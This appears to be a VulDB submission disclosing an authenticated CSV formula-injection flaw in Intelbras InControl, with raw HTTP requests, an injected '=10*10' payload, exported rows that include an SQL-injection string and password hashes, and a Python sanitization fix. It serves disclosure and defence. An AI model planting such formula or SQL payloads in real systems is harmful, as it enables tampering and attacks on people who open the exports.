Submission #600881: Intelbras InControl 2.21.60.9 CSV Injection

Title: Intelbras InControl 2.21.60.9 CSV Injection
Description:

There is an authenticated CSV Injection (also known as Formula Injection) vulnerability in the InControl software. The application doesn't sanitize user input in the /v1/operador/<id> endpoint. This endpoint is used to update user information, such as username, password, etc. After updating a user, we can use the export users functionality, which can be requested in this endpoint:

    /v1/operador?separator=SelectedFields&formato=csv&SelectedFieldsnome_operador=Nome%20do%20operador&SelectedFieldsusername=Login&SelectedFieldsgroups=Perfil%20de%20Operador

This is the request that updates a user; note that we've injected the formula "=10*10" in the "nome_completo" parameter, and this will be processed and we will get "100" in the output.

    PUT /v1/operador/3 HTTP/1.1
    Host: localhost:4441
    Content-Length: 849
    Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
    Accept-Language: pt-BR,pt;q=0.9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
    Accept: application/json, text/plain, */*
    Content-Type: application/json
    Origin: https://localhost:4445
    Referer: https://localhost:4445/
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive

    {"id":3,"pessoa":{"id":5,"nome_completo":"=10*10","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesara","password":"pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag=","groups":{"id":4,"name":"Visitante","permissions":[{"id":133,"codename":"add_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":134,"codename":"change_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":135,"codename":"delete_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":136,"codename":"view_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}}]},"is_active":true,"is_superuser":true}}

-------------------------------------------------------------------

Here we have the download request:

    GET /v1/operador?separator=SelectedFields&formato=csv&SelectedFieldsnome_operador=Nome%20do%20operador&SelectedFieldsusername=Login&SelectedFieldsgroups=Perfil%20de%20Operador HTTP/1.1
    Host: localhost:4441
    Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
    Accept-Language: pt-BR,pt;q=0.9
    Accept: application/json, text/plain, */*
    Origin: https://localhost:4445
    Referer: https://localhost:4445/
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive

----------------------------------------------------------------

After opening the CSV in Excel we have the following values:

    nome_completo  | email             | telefone_celular | imagem | username  | password                                                                        | group         | is_active | is_superuser
    pentester      | [email protected] |                  |        | pentester | pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag= | Administrador | True      | True
    100            | [email protected] |                  |        | cesara    | pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag= | Visitante     | True      | True
    ' OR '1'='1'-- | [email protected] |                  |        | admin2    | pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E= | Administrador | True      | False
    Admin          |                   |                  |        | admin     | pbkdf2_sha256$150000$J0ZQzdvJeF1v$8aOKW77aCwYEEIh/o0zW5oWhOVAnNiKOnvwaPGMFjqw= | Administrador | True      | True
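The fix for this class of bug sits in the export path: any user-controlled field must be neutralized before it is written to the CSV, so that a spreadsheet shows it as text instead of evaluating it. The following is an added illustration, not InControl's code; the exporter, the sample rows and the column set are constructed to mirror the report (only four of the exported columns are kept), and the hardening follows the common practice of prefixing formula-triggering cells with an apostrophe and quoting every field.

```python
import csv
import io

# Leading characters that make Excel / LibreOffice / Google Sheets treat a cell
# as a formula. Tab and CR are included because they can also start formula
# parsing right after a field delimiter.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return a cell value that a spreadsheet will display as plain text.

    A leading apostrophe forces text interpretation; csv.writer with
    QUOTE_ALL additionally wraps the field so embedded separators or
    quotes cannot split it into extra cells.
    """
    if value is None:
        return ""
    text = str(value)
    if text.startswith(FORMULA_PREFIXES):
        return "'" + text
    return text


def export_operators(rows, sanitize=True):
    """Build the operator export. sanitize=False reproduces the vulnerable
    behaviour described in the report: user-controlled fields are written
    verbatim, so "=10*10" reaches the spreadsheet as a live formula."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["nome_completo", "email", "username", "group"])
    for row in rows:
        cells = [row["nome_completo"], row["email"], row["username"], row["group"]]
        if sanitize:
            cells = [neutralize_cell(c) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


# Constructed sample data modelled on the export shown in the report
# (hypothetical e-mail; no real account data).
SAMPLE_ROWS = [
    {"nome_completo": "=10*10", "email": "user@example.invalid", "username": "cesara", "group": "Visitante"},
    {"nome_completo": "Admin", "email": "", "username": "admin", "group": "Administrador"},
]


def first_name_cell(csv_text):
    """Return the nome_completo value of the first data row as a CSV parser sees it."""
    reader = csv.reader(io.StringIO(csv_text))
    next(reader)  # skip header
    return next(reader)[0]


if __name__ == "__main__":
    print(export_operators(SAMPLE_ROWS, sanitize=False))  # first cell: =10*10
    print(export_operators(SAMPLE_ROWS))                  # first cell: '=10*10
```

The apostrophe stays visible in some viewers; if that is unacceptable for a given deployment, the alternative is to reject such input at the /v1/operador/<id> update endpoint, which also removes the stored value rather than only the export.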
Source: https://localhost:4441/v1/operador/<id>
User: lorenzomoulin (UID 33175)
Submitted: 20/06/2025 00:18 (8 months ago)
Moderated: 04/07/2025 08:01 (14 days later)
Status: Accepted
VulDB entry: 314836 [Intelbras InControl up to 2.21.60.9 /v1/operador/ privilege escalation]
Points: 20
